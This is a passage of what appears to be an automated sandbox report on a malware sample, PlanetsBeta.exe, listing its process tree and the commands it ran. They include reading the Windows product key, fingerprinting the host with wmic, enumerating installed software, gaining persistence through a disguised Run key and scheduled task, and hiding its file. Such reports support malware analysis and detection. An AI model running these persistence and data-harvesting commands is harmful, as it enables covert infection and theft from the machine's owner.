PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 2268 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2308 wrote to memory of 2268 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 212 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\reg.exe
PID 212 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\reg.exe
PID 212 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2900 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1840 wrote to memory of 544 N/A C:\Windows\system32\reg.exe C:\Windows\system32\net.exe
PID 1840 wrote to memory of 544 N/A C:\Windows\system32\reg.exe C:\Windows\system32\net.exe
PID 544 wrote to memory of 4396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 544 wrote to memory of 4396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe

"C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1604 --field-trial-handle=1752,7170054449837949793,9802646453805656752,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1944 --field-trial-handle=1752,7170054449837949793,9802646453805656752,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2604 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=2604 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2604 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=2604 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupdy7TVh /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupdy7TVh /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe\" /F /rl highest"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupdy7TVh /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupdy7TVh /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe\" /F /rl highest

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupdy7TVh /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe\"""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\P6LjztgNZS7e.vbs"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cscript.exe

cscript C:\Users\Admin\AppData\Roaming\P6LjztgNZS7e.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"

C:\Windows\system32\cmd.exe

